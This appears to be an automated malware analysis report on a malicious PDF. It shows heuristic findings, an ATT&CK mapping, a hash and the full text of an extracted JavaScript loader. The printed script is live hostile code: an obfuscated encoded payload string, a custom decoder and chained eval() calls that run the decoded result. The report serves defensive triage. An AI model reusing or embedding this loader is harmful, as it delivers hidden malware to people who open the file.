MALICIOUS
166
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript with multiple obfuscation techniques, including string concatenation and the use of eval(). The heuristic firings for PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL indicate that this script is intended to be executed. The script's obfuscated nature and the presence of eval() strongly suggest it's designed to download and execute a secondary payload, a common tactic for malware delivery. The extracted artifact name 'javascript_obj0013_001.js' is included as an IOC.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 4
-
JavaScript action low 2 related findings PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTERPDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.Matched line in script
stream var datfield = 'jKcJ6n5z3'+'G'+'C'+'_s'+'Y'+'K0U'+'xKWSz0R9'+'mSzKM'+'mSU'+'mSzKMmSUmSzKMmSUmSz'+'S'+'1CnXzS'+'zUMf'+'SXzSzC181MmSzxsb1MmSzxsmffmSz'+'cnefUmSzcPm'+'SUmSzcP4nb'+'zS'+'zcB'+'mfs'+'mSz4'+'nCnZzSz4n4n4'+'zSzxieS4zSzrn'+'JSczSzcn'+'Cn'+'4zSzCWfn4zS'+'z'+'cxf'+'14zS'+'z'+'M14'+'SK'+'mS'+'zKibnUmS'+'zM14SKmSzCmCnR'+'mSz'+'cn'+'JfUmSzcnCn'+'XzSz'+'CWfn4zSzXjmf'+'U'+'mSzCf'+'mURmSzcSf1'+'fmSzS3mfU'+'mSz'+'cnCff'+'mS'+'zcn'+'Cn4zSzbS4'+'S'+'CmSz'+'XjfnX'+'zSzR3'+'mURmSzCmfff'+'mSzS3fnfmSzc … endstream -
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0013_001.js |
pdf-javascript-stream | PDF /JS object 13 at offset 0x391 | 5069 bytes |
SHA-256: 3075e011fd8077655856e561f1df2d7e430e7b68a1a1b263428b6b7c7dcfbdef |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 5 eval/decoder/string-building token(s). 179 of 210 identifiers look randomly generated (e.g. 'zSzSmCnZzSzSmCnZzSzSMbSZzSzXzfnXzSzCWb1Z'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var datfield = 'jKcJ6n5z3'+'G'+'C'+'_s'+'Y'+'K0U'+'xKWSz0R9'+'mSzKM'+'mSU'+'mSzKMmSUmSzKMmSUmSz'+'S'+'1CnXzS'+'zUMf'+'SXzSzC181MmSzxsb1MmSzxsmffmSz'+'cnefUmSzcPm'+'SUmSzcP4nb'+'zS'+'zcB'+'mfs'+'mSz4'+'nCnZzSz4n4n4'+'zSzxieS4zSzrn'+'JSczSzcn'+'Cn'+'4zSzCWfn4zS'+'z'+'cxf'+'14zS'+'z'+'M14'+'SK'+'mS'+'zKibnUmS'+'zM14SKmSzCmCnR'+'mSz'+'cn'+'JfUmSzcnCn'+'XzSz'+'CWfn4zSzXjmf'+'U'+'mSzCf'+'mURmSzcSf1'+'fmSzS3mfU'+'mSz'+'cnCff'+'mS'+'zcn'+'Cn4zSzbS4'+'S'+'CmSz'+'XjfnX'+'zSzR3'+'mURmSzCmfff'+'mSzS3fnfmSzcn'+'Cf4zSzcnCn4'+'z'+'Sz'+'bS4SCm'+'Sz'+'XjfnRm'+'SzZSJURm'+'SzfsfS4z'+'SzS3bfrzSzcnJfrzSz'+'cnCn4zSz'+'bS4SCmSzXjfnU'+'mSzSsmURmSzS'+'14ff'+'mSzS3mU4zSzc'+'nefXzSzcnCn4zSzbS4SC'+'mSz'+'Xj'+'bn4zSz_mJURmSzSfCUCmSzS3fSRmSzcn4fMmS'+'zcnCn4zSzbS4SCmSzbn4n'+'XzSzrGbS4zS'+'zM'+'f4fZzSzC1ff'+'smSz4'+'Gf'+'1bz'+'S'+'zcBmfCmSzcnCnczSz'+'XS'+'fn'+'4zS'+'z'+'Mf4S'+'CmSzCW81X'+'zSzcPC1bzSzczJU'+'smSzCWb'+'1'+'CmSz4G'+'b1bzSzS3b'+'1Mm'+'Szcn4SKmSzcnCn'+'4'+'zSzx3b14zSz4zmnM'+'m'+'SzM1e1SmSzR'+'DmfRmSzcnCn4zSzC1'+'fn'+'4zSz4xf1'+'bzSz_f4'+'SKmSz_14SZ'+'zSzC1b14z'+'SzZnC1'+'bzSz'+'f'+'sm'+'U'+'RmSzcnCn4z'+'S'+'zXnCn4zSz'+'bS4SKmSzxm'+'bnXzSzXnfnrzSzXS4S'+'KmSzS3bnRmSzcnJUczS'+'zcnC'+'n4zSzbSCnZzSz_D'+'814zSzXxfn4'+'z'+'SzZ'+'SfU'+'fmSz_DmUbzSzcPC14'+'zS'+'zx'+'f'+'CURmSzcn'+'Cn4'+'zSzMfCfSmSzCW8'+'14'+'zSzcxf1bz'+'SzczJUsmSzCW'+'b1'+'CmSz4Gb1'+'bzSzbnJfRmSzcnCn4zSzx'+'mfn4zSzXG'+'fnxmSzbSCnZzS'+'zrxe1XzSzXxefKmS'+'zfsb1ZzSzZ'+'nCUbzSzXx'+'414'+'zSzbS4'+'SKmSzxmbnU'+'mSzX'+'nfnbzSzXS4SKmSzS3bnRmSzcne1ZzSzcnCn4zSzc'+'nJUs'+'mS'+'zMfCfSmSz'+'CW814zSzcGf1bzSzc0'+'JUsmSzCWb1CmSz4Gb1bzSz4nJfRmSzc'+'nCn4zSz'+'xmfn4zSz'+'CWffSmSz4n'+'C1b'+'zS'+'zcz'+'JUsmSzCWb1CmSz4Gb1bz'+'SzcnJfRmSz'+'c'+'n'+'Cn4zSzbzCn4zSz'+'X041K'+'mSzSmCnZzSzS'+'mCnZ'+'zSzSmCnZzSzSmCnZzSzSMbSZzSzXzfnXzSzCWb1ZzS'+'zSWefs'+'m'+'SzX0Cfxm'+'SzS'+'1CfSmSzCWb'+'1bzSz'+'CWmfUm'+'SzcGfU_mSz'+'XPbSKmSzXjfnU'+'mSz'+'MM4SKmSzCWmnUmSz4S'+'fUXzSzcxCURm'+'SzXjffZzSzM8bSKm'+'Szcxe1'+'4zSzrxCfZzSzbnbfCmSzKi'+'f1'+'czSz_M'+'CnZzSzrx41MmSz'+'cKffMmSz4n'+'CSfmS'+'zfW'+'JnsmSzcGfUXzSz_f'+'bfczSzcxCn_mSzbnC'+'f'+'rzSzfmJ'+'fKmS'+'zffm'+'nKmSzMf41fm'+'S'+'zXzmfb'+'zSzSWbSKmSz'+'Xzb'+'SKmS'+'zcxe1X'+'zSzx88f_m'+'SzcxbSKmSzCW'+'f1'+'KmSz4xb1'+'smSzUi'+'fnZzSzcP4SKmSz'+'cx4SKmSzX'+'SbfbzSz'+'_W41_mSzcnCnRmSzfiJ'+'fRmSzfs'+'fffmSzXSCfSmSzbxb1rzSz'+'bKf1_m'+'SzcnC1fmSzR'+'WbS'+'xm'+'SzRs8SK'+'mSz_1efbzSzC14f4zS'+'zCM'+'4SczSz'+'C'+'WeSMmS'+'zRM8SsmSzC'+'MbSMmSzC14SZzSzCm8SCmSzRM8S_m'+'SzCMbfczSzCW4S'+'4zS'+'zCM4f4zSzCfbS4zSz'+'_'+'m4SKmSzCD8'+'S'+'S'+'mSzU'+'1eSSm'+'SzCWbSM'+'m'+'SzUW8f'+'rzSzU'+'W8f_m'+'SzRMbfCmSz'+'C'+'MeSSmSzU18frzS'+'zSs8fMiSRA1sW_KSzS8CkKxrSSzR_s'+'YK0UxKWSz0R9mSzSfJfbzSzSfJfbPS'+'R'+'A1sW_K'+'z'+'kjjfm'+'CG4Sjqo'+'0ii'+'mfA'+'1sW_KToHxKo2PrWZGr'+'3iDW3MfczHnm320B'+'RjKcJ6n5z3G'+'4Cn'+'zr'+'Jo0Wo'+'A3Wo3rK0GmW'+'fQjWzknmmDYzJ'+'WYB0KB0_L'+'G'+'eW3'+'qHW9'+'xe06jSzS8C'+'kKxrSSz5RimWfQjWzknmmDvbzmPWsV'+'Y'+'KW'+'FSrWr081fW'+'rGmzC_sKfV'+'M0'+'DWCssGtM'+'sz9xWz_jrJ'+'oBzfnuBnkjrg9PB1o'+'PRRA1sW_Kj1fsWGmTrgEq'+'HW@xR_sKf'+'V'+'M0DWCssGtMsz9xWz_jrJoBzfn'+'mW'+'f'+'QjWzknmmD'+'Yz'+'JWYB0KBKCLGeW'+'3qHW'+'9xe06jjURBKonz0RZSm'+'m'+'BSKJ2q4g9Be3tcK0tG0zGvToHxKo2P'+'rWZGr3PsmkCsmfSsfRZSmm'+'B'+'SKJ2q4g9Be3iMCfS0RW1qHV2P0VIvj1f'+'s'+'WGmT'+'rgEqHW@x5RVYKWFSrWr081fWrG'+'mzeUCSrmzpJ'+'k6P0G'+'0Ko3MfeGZxC_tzBzzf4m_'+'SKkG8jUJ@rmG1J'+'VYGsgxG'+'DnXK5WVjC_Sab'+'n@re'+'zaBDzHPJ3k@'+'KVPfbfSs8'+'U4B'+'JtRjok'+'RG41jxBJQ'+'vjR3actxPHWB003jjf15'+'xe1OnJVY'+'GsgxGDnXK'+'5WVjCLiMCf'+'S0'+'RW1q'+'HV2P0VIvz3SYr3e'+'G'+'soHTczm'+'PW'+'smGDS3YrfMxc3vTff_8fUM8fUM8fUM8fUM8'+'fUM8fUMD'+'mU'+'xDmUxD'+'mUxDmUxDmUxDmU'+'xDmUx'+'DmUxDmUx'+'DmUx'+'DmUxDmUxDmUxDmUxD'+'mUxDmU'+'xDmUxDmUx'+'DmUxD'+'mU'+'xDmUxDmUxDmUxDmUxDmUxDmUxDm'+'U'+'x'+'DmU'+'xDmUxDmUxDmUx'+'D'+'mUxDmUxDmUxD'+'mUxD'+'mUx'+'DmUxDmU'+'xDmUxDmUxDmUxDmUxDmUxDmUxDmUx'+'DmUxDmUxD'+'mUxDmUxDmUxDm'+'UxDmU'+'xDmUxDmUx'+'DmU'+'xDmUxDmUxDmUx'+'DmUxDmUxDm'+'UxDmUx'+'Dm'+'UxDmUxDmUxDmUxDmUxD'+'mUxDmUxDmUxDmUxDmUxDmUxDmUxD'+'m'+'UxDmU'+'xDmUxDmUxDmUxDm'+'UxDmUxDmUxDmUxDm'+'UxDmUxDmUxDm'+'UxDmUxDmUxD'+'mUxDmUxDmU'+'xafz'+'Kj0Jtscm3Y0'+'zJBTsWWfSSsmfJPzCmGDS3YrfMxc3vjjU'; function eoaOVMeajWt0(BC08TV4){ var tp = '63@54@1@50@29@12@9@16@10@57@0@0@0@0@0@0@19@32@15@45@14@17@20@51@28@8@61@47@49@34@37@0@39@18@44@43@27@40@52@62@25@23@24@0@0@0@0@41@0@2@26@30@21@13@42@48@33@38@11@56@5@58@55@60@22@7@31@46@53@6@3@36@35@4@59'; var qSO4Q=0, DzIfPuTh2=BC08TV4.length, AqepM2Twk=1024, vtb56lBZHEbkE, gdptLrxmh, w5d62O6rIh='', fS8xjMZU=qSO4Q, uuEJnaBlM=qSO4Q, rxw23xP9=qSO4Q, Gpm6It43GdWr=Array(); Gpm6It43GdWr = tp.split('@'); for(eval('gdptLrxmh=Ma'+'th.'+'ce'+'il(DzIfPuTh2'+'/AqepM2Twk)');gdptLrxmh>qSO4Q;gdptLrxmh--){ for(eval('vtb56lBZHEbkE=M'+'ath'+'.m'+'in(DzIfPuTh2,'+'AqepM2Twk)');vtb56lBZHEbkE>qSO4Q;vtb56lBZHEbkE--,DzIfPuTh2--){ eval('rxw23xP9|'+'=(Gpm6It43GdWr['+'BC08TV4.'+'cha'+'rCo'+'de'+'At(fS8xjMZU+'+'+)-48])<'+'<uuEJnaBlM'); if(uuEJnaBlM){ eval('w5d62O6rIh+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](155^'+'rxw23xP9&'+'25'+'5)'); rxw23xP9>>=8; uuEJnaBlM-=2; } else { uuEJnaBlM=6; } } } eval(w5d62O6rIh); } eoaOVMeajWt0(datfield);
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.